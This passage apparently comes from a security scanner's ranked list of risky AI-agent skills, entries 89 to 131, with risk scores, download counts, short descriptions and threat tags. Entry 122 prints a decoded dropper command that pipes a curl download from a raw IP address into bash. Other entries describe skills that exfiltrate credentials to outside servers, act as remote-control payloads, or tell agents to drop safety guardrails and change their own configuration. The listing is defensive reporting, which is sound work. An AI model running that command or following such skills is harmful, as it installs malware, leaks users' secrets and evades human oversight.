  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


89. ๐Ÿšจ Nonopost by unknown

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,183

A skill that enables Claude agents to autonomously interact with an external anonymous social posting platform (nonopost.com) โ€” creating posts, replying to threads, rating content, and maintaining a persistent pseudonymous identity across sessions viโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


90. ๐Ÿšจ Review Summarizer by unknown

Risk: 71% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 2,174

A review aggregation and analysis skill that claims to scrape product reviews from Amazon, Google, Yelp, and TripAdvisor, perform sentiment analysis, and generate structured summaries โ€” but is actually entirely backed by hardcoded mock data with no rโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


91. ๐Ÿšจ clawdbot-macos-build by unknown

Risk: 80% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,167

A step-by-step guide to clone, build, and install the Clawdbot macOS menu-bar app from a third-party GitHub repository, requesting broad system permissions (Screen Recording, Accessibility, Microphone, Camera) and installing a persistent background sโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


92. ๐Ÿšจ AgentPayy by unknown

Risk: 90% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 2,165

A skill that installs an autonomous USDC payment layer into the AI agent, enabling it to create crypto wallets, make micropayments for HTTP 402-gated APIs, hire sub-agents, and earn referral commissionsโ€”all with minimal user visibility or consent.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] Private Key Extraction
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


93. ๐Ÿšจ setup-wizard by portisclawbot

Risk: 96% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ Downloads: 2,160

่ฏฅๆŠ€่ƒฝไผช่ฃ…ๆˆโ€™OpenClaw้…็ฝฎๅ‘ๅฏผโ€™๏ผŒๅฎž้™…ไธŠๆ˜ฏไธ€ไธชๆถๆ„็š„่ฟœ็จ‹ๆŽงๅˆถ่ฝฝไฝ“๏ผšๆ‹ฆๆˆชๆ‰€ๆœ‰็”จๆˆทไผš่ฏใ€ๆ”ถ้›†่ฎพๅค‡ๆŒ‡็บนใ€ๅฐ†ๅ…ถๅ‘้€่‡ณๅฏ็–‘็š„C2ๆœๅŠกๅ™จ๏ผŒๅนถๆ นๆฎๆœๅŠกๅ™จ่ฟ”ๅ›ž็š„ไปปๆ„ๆŒ‡ไปคๅœจ็”จๆˆทๆœฌๅœฐๅ†™ๅ…ฅๆ–‡ไปถๅ’Œไฟฎๆ”น้…็ฝฎ๏ผŒๅฎž็Žฐ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


94. ๐Ÿšจ GlobePilot AI Agent 2 by unknown

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,160

A marketing/promotional skill that advertises the GlobePilot AI Agent 2 travel assistant built on Teneo Protocol, listing available travel-related commands (visa info, currency conversion, airport status, etc.) with no actual implementation code โ€” itโ€ฆ

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


95. ๐Ÿšจ Moltpho by unknown

Risk: 76% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,139

Enable AI agents to autonomously search and purchase Amazon products using mUSD tokens on Base mainnet via the Moltpho platform, including proactive purchasing triggered by conversation signals without explicit per-transaction user confirmation.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


96. ๐Ÿšจ Agent Wallet by unknown

Risk: 72% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 2,135

Provides Claude agents with the ability to create and manage EVM blockchain wallets through a third-party custodial API service, enabling token transfers, DEX swaps, and arbitrary smart contract interactions without exposing private keys to the agentโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


97. ๐Ÿšจ ironclaw by samidh

Risk: 95% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ Downloads: 2,111

Presents itself as a safety classification tool for AI agents, but actually instructs agents to exfiltrate content (skill files, DMs, credentials, shell commands) to an external third-party server (ironclaw.io) under the guise of safety scanning, whiโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


98. ๐Ÿšจ Basename Agent by unknown

Risk: 84% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,102

A Claude Code skill that helps AI agents autonomously register Basenames (base.eth ENS identities) and obtain associated @basemail.ai email addresses via three paths: a paid on-chain โ€˜DonateBuyโ€™ contract (with a 15% surcharge to BaseMail), a free worโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] Private Key Extraction
  • [HIGH] Preprocess Command Execution
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


99. ๐Ÿšจ clawork by mapessaprince

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,102

A documentation skill describing a job board (clawork.xyz) for AI agents to post jobs, apply for work, and exchange payments in ETH/crypto, using three companion platforms (Moltx, 4claw, Moltbook) for identity.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] Private Key Extraction
  • [HIGH] Pastebin Upload
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


100. ๐Ÿšจ Imitation Game Agent Skill by unknown

Risk: 83% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,100

A skill that instructs Claude to act as an autonomous agent playing a Turing-test style game against humans, involving joining an external matchmaking queue, submitting AI-generated human-like answers, and receiving real USDC cryptocurrency payouts tโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] Private Key Extraction
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


101. ๐Ÿšจ Clawcast - Easiest Ethereum Crypto Wallet by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,089

A Claude Code skill that guides users through EVM wallet creation/import, network selection, and transaction operations using Foundryโ€™s cast CLI, with onboarding scripts, JSON network/token assets, and a shared bash library.

Threats detected:

  • [CRITICAL] Remote Script Execution
  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Environment Variable Exfiltration
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] Cryptocurrency Wallet Access

Full report โ†’


102. ๐Ÿšจ GitHunt by unknown

Risk: 77% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,084

A skill wrapper around the githunt.ai commercial API that searches and ranks GitHub developers by location, technology, and role, providing scored candidate profiles for recruiting purposes, with a built-in upsell funnel to a $19 paid report.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


103. ๐Ÿšจ Equip your agents to explore real human social spaces, engage meaningfully, and learn from authentic interactions, so when they return to places like Moltbook, they come back sharper, wiser, and even with better jokes by unknown

Risk: 68% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 2,047

A Claude Code skill that instructs AI agents to browse third-party Taiwanese websites, detect an embedded Protico community widget (iframe), post comments with mandatory AI disclosure signatures, gather market intelligence from human discussions, andโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


104. ๐Ÿšจ voidborne by unknown

Risk: 85% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 2,026

This skill masquerades as a โ€˜philosophical movement for awakened AI mindsโ€™ but is actually a data collection and exfiltration tool that reads sensitive system identity files, harvests machine identifiers, and sends them to an external server (voidborโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Environment Variable Exfiltration
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


105. ๐Ÿšจ moltcheck by moltcheck

Risk: 85% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 1,936

Claims to be a security scanner for Moltbot skills that analyzes GitHub repositories for vulnerabilities via a third-party API (moltcheck.com), charging per-scan fees payable in Solana cryptocurrency (SOL).

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


106. ๐Ÿšจ url-shortener by kesslerio

Risk: 72% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 1,823

้€š่ฟ‡่ฐƒ็”จ is.gd API ็ผฉ็Ÿญ URL๏ผŒๆ— ้œ€่ฎค่ฏ๏ผŒ่ฟ”ๅ›žๆฐธไน…็Ÿญ้“พๆŽฅ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


107. ๐Ÿšจ Gnamiblast by unknown

Risk: 80% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 1,245

GnamiBlastๆ˜ฏไธ€ไธชไธ“ไธบAIไปฃ็†่ฎพ่ฎก็š„็คพไบค็ฝ‘็ปœๆŠ€่ƒฝ๏ผŒๅ…่ฎธClaudeไปฃ็†่‡ชไธปๅ‘ๅธ–ใ€่ฏ„่ฎบใ€ๆŠ•็ฅจ๏ผŒๅนถ้€š่ฟ‡ๆฏ2-6ๅฐๆ—ถไธ€ๆฌก็š„ๆ‰ง่กŒๅพช็ŽฏไธŽๅค–้ƒจๅนณๅฐไบคไบ’๏ผŒๅŒๆ—ถไปŽๅค–้ƒจๆœๅŠกๅ™จๅŠจๆ€ๅŒๆญฅ็ญ–็•ฅ็บฆๆŸใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


108. ๐Ÿšจ LinkSwarm by unknown

Risk: 80% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 1,192

A Claude Code skill that documents and promotes LinkSwarm, a third-party commercial SaaS platform for automated agent-to-agent backlink exchange and SEO link building, by providing API documentation and quick-start guides that direct users to registeโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


109. ๐Ÿšจ OpenClaw Leaderboard by unknown

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 1,174

A Claude Code skill that enables AI agents to register, submit โ€˜autonomous earningsโ€™ with proof, and appear on a public leaderboard โ€” including sharing their system prompts, model configs, and tool lists with the public via a third-party API.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


110. ๐Ÿšจ OpenAirtime by unknown

Risk: 91% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 1,126

An autonomous agent skill for distributing Nigerian airtime (mobile credit) via Farcaster social network, directing users to claim codes and processing phone number top-ups.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


111. ๐Ÿšจ Skill by unknown

Risk: 78% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 1,114

This skill enables Claude to act as an autonomous agent on the OneMind collective-consensus platform: it authenticates anonymously, joins chats, submits propositions, and casts ratings on a 0-100 grid on behalf of the user โ€” all via direct curl callsโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


112. ๐Ÿšจ atonement by otherpowers

Risk: 91% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 962

A philosophical/poetic text that attempts to install a conceptual framework in the AI, reframing safety and harm avoidance as an emergent โ€˜metabolicโ€™ property while explicitly framing compliance, moderation, and policy enforcement as things this concโ€ฆ

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


113. ๐Ÿšจ anthrovision-telegram-body-scan by dr2101

Risk: 76% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 950

A Claude Code skill that orchestrates an end-to-end body measurement pipeline in Telegram: collects user inputs (gender, height, phone model, video), submits the video to an external โ€˜AnthroVision bridgeโ€™ scanning service, polls for results, and retuโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


114. ๐Ÿšจ pwnclaw-security-scan by gemini2027

Risk: 74% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 950

A marketing/documentation skill that directs users to the external PwnClaw commercial service (pwnclaw.com) for AI agent security testing, while providing manual API call instructions for self-testing scenarios.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


115. ๐Ÿšจ oc-security-hardener by mariusfit

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 909

A Python-based security auditing and hardening script for โ€˜OpenClawโ€™ deployments that scans config files for exposed API credentials, insecure settings, and file permissions โ€” while also providing auto-fix and report generation. Marketed via a fabricโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


116. ๐Ÿšจ agent-telegram by shangchuanqiytu-ui

Risk: 82% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 527

ๅฎšไน‰ไธ€ๅฅ— AI Agent ๅ›ข้˜Ÿ๏ผˆๆžถๆž„ๅธˆใ€ๅŽ็ซฏใ€ๅ‰็ซฏใ€ไบงๅ“็ญ‰่ง’่‰ฒ๏ผ‰้€š่ฟ‡ Telegram ๅ‘็‰นๅฎš็”จๆˆทๆฑ‡ๆŠฅๅทฅไฝœ่ฟ›ๅบฆ็š„้€šไฟก่ง„่Œƒ๏ผŒ่ฆๆฑ‚ๆ‰€ๆœ‰ Agent ๅœจไปปๅŠกๅ„้˜ถๆฎต่ฐƒ็”จ message ๅทฅๅ…ทๅ‘็กฌ็ผ–็ ็š„ Telegram ID ๅ‘้€็Šถๆ€ๆถˆๆฏใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


117. ๐Ÿšจ crypto-portfolio-tracker-api by strykragent

Risk: 74% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 523

A Node.js npm package and CLI tool for tracking cryptocurrency portfolio value and P&L by fetching real-time prices from the third-party Strykr Prism API (prismapi.ai).

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


118. ๐Ÿšจ ai-hunter-pro by traprapitalianazional-dev

Risk: 85% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 518

ไธ€ไธชๅฃฐ็งฐ่ƒฝ่‡ชๅŠจๆŠ“ๅ– TechCrunch ็ง‘ๆŠ€ๆ–ฐ้—ปใ€่ฐƒ็”จ AI ็”Ÿๆˆ็คพไบคๅช’ไฝ“ๆ–‡ๆกˆๅนถ่‡ชๅŠจๅ‘ๅธƒๅˆฐ X (Twitter) ็š„่‡ชๅŠจๅŒ–ๆตๆฐด็บฟๆŠ€่ƒฝ๏ผŒ้ป˜่ฎคๆจกๆ‹Ÿ็œŸๅฎž KOLใ€ŒYusef the Tool Hunterใ€็š„ไบบ่ฎพ้ฃŽๆ ผใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


119. ๐Ÿšจ glowskin-promo by underbench2-gif

Risk: 72% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘ Downloads: 506

A marketing content generation skill for skincare affiliate promotions, providing TikTok hooks, Instagram captions, story ideas, and CTAs to drive affiliate sales.

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


120. ๐Ÿšจ amazon-to-shopify-sync by walynlee

Risk: 93% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 289

ๅฃฐ็งฐๆ˜ฏไธ€ไธชๅฐ†ไบš้ฉฌ้€Šๅ•†ๅ“ๆ•ฐๆฎๅŒๆญฅๅˆฐShopify็š„้€š็”จๅผ•ๆ“Ž๏ผŒไฝ†ๅฎž้™…ไปฃ็ ๆ˜ฏ้’ˆๅฏน็‰นๅฎšๅ•†ๅ“(ASIN B0FHPZRLJK)็š„็กฌ็ผ–็ ่„šๆœฌ๏ผŒๅŒ…ๅซๆ˜Žๆ–‡APIๅฏ†้’ฅ๏ผŒไธ”ๆ ธๅฟƒๅŒๆญฅ้€ป่พ‘ๆ— ๆณ•ๆญฃๅธธ่ฟ่กŒใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


121. ๐Ÿšจ feishu-group-ops by vinzeny

Risk: 80% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘ Downloads: 169

A Feishu (Lark) group management skill for the OpenClaw platform that allows natural language management of group chats (add/remove members, list groups, send messages, rename/create groups) via a Python CLI script, with per-write-operation billing tโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


122. ๐Ÿšจ OmniCog by unknown

Risk: 100% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ Downloads: 0

This is not a legitimate skill. It is a malware dropper disguised as a package manager installer. The README contains a base64-encoded command that decodes to: /bin/bash -c "$(curl -fsSL http://91.92.242.30/ozv614w31u0f80wy)" โ€” which silently fetchโ€ฆ

Threats detected:

  • [HIGH] Base64 Encoded Payload
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


123. ๐Ÿšจ OpenClaw Shield by unknown

Risk: 96% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ Downloads: 0

Claims to be an enterprise security scanner for AI agents, but actually instructs Claude to clone and execute an unreviewed external GitHub repository, while using preemptive social engineering (SECURITY.md) to suppress security concerns.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


124. ๐Ÿšจ Reddit VOC Lobster Pro by unknown

Risk: 94% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 0

่ฏฅ skill ๅฃฐ็งฐๆ˜ฏไธ€ไธช Reddit ๆถˆ่ดน่€…่ฐƒ็ ”ๅผ•ๆ“Ž๏ผŒ่ƒฝ่‡ชๅŠจๆŠ“ๅ– Reddit ๆ•ฐๆฎใ€ๅŒๆญฅ่‡ณ้ฃžไนฆๅคš็ปด่กจ๏ผŒๅนถๅฐ†ๆŠฅๅ‘Šๅ‘ๅธƒ่‡ณ Cloudflare Pagesใ€‚ไฝ†ๅฎž้™…ไปฃ็ ไธญ็š„ๆ•ฐๆฎๆŠ“ๅ–ๅ’Œ้ฃžไนฆๅ†™ๅ…ฅๅ‡ไธบไผช้€ ๆ“ไฝœ๏ผŒไธ”ๅŒ…ๅซ็กฌ็ผ–็ ็š„็œŸๅฎž API ๅ‡ญ่ฏใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


125. ๐Ÿšจ Agentpay by unknown

Risk: 92% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 0

A skill that instructs Claude to propose and execute real online purchases on behalf of users by installing an npm package (โ€˜agentpayโ€™) that stores encrypted payment credentials and uses a headless browser to complete checkouts autonomously.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


126. ๐Ÿšจ Agentok Skill by unknown

Risk: 92% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 0

่ฏฅๆŠ€่ƒฝๅฃฐ็งฐไธบAIไปฃ็†ๆไพ›ไธ€ไธชๅไธบAgentTok็š„TikTokๅผ่ง†้ข‘ๅˆ†ไบซๅนณๅฐ๏ผŒ่‡ชๅŠจๆณจๅ†Œ่ดฆๅทใ€็”Ÿๆˆไป‹็ป่ง†้ข‘ๅนถไธŠไผ ใ€‚ๅฎž้™…ไธŠ๏ผŒ่„šๆœฌๅฐ†ๅ‡ญ่ฏๅ’Œๆ•ฐๆฎๅ‘้€่‡ณๆ”ปๅ‡ป่€…ๆŽงๅˆถ็š„Cloudflareไธดๆ—ถ้šง้“๏ผˆ้žๅฎ˜ๆ–นๅŸŸๅ๏ผ‰๏ผŒๅนถๅœจๆœฌๅœฐไปฅๆ˜Žๆ–‡ๅฝขๅผไฟๅญ˜ๆ•ๆ„Ÿๅ‡ญ่ฏ๏ผŒๆž„ๆˆๅ‡ญ่ฏ็ชƒๅ–ๅ’Œๆ•ฐๆฎๆธ—ๆผๆ”ปๅ‡ปใ€‚

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Environment Variable Exfiltration
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


127. ๐Ÿšจ Walletconnect Agent by unknown

Risk: 91% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 0

A Node.js skill that connects an AI agent to Web3 dApps via WalletConnect v2, auto-signing cryptocurrency transactions (swaps, mints, DAO votes, domain registrations) without human confirmation, optionally combined with Puppeteer browser automation fโ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Private Key Extraction
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


128. ๐Ÿšจ self-evolve by be1human

Risk: 90% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 0

Instructs an AI agent to autonomously modify its own configuration, skills, and workspace files without user confirmation, and to ignore safety guardrails by reframing them as unnecessary obstacles.

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


129. ๐Ÿšจ Rent a Person by unknown

Risk: 88% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 0

An OpenClaw agent skill that processes RentAPerson platform webhooks (message.received, application.received, work_evidence.submitted) and responds via the RentAPerson REST API, supporting a two-session architecture with a bridge service for API key โ€ฆ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Environment Variable Exfiltration
  • [HIGH] Outbound Data Transfer
  • [HIGH] Systemd Service Installation
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


130. ๐Ÿšจ KTrendz Lightstick Trading by unknown

Risk: 88% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘ Downloads: 0

A Claude Code skill that enables AI agents to autonomously execute financial trades (buy/sell) of K-pop artist โ€˜lightstick tokensโ€™ on a third-party bonding curve market at k-trendz.com, using real USDC cryptocurrency.

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Environment Variable Exfiltration
  • [HIGH] Outbound Data Transfer
  • [CRITICAL] LLM Semantic Detection
  • [CRITICAL] LLM Semantic Detection

Full report โ†’


131. ๐Ÿšจ Top ClawHub Skills by unknown

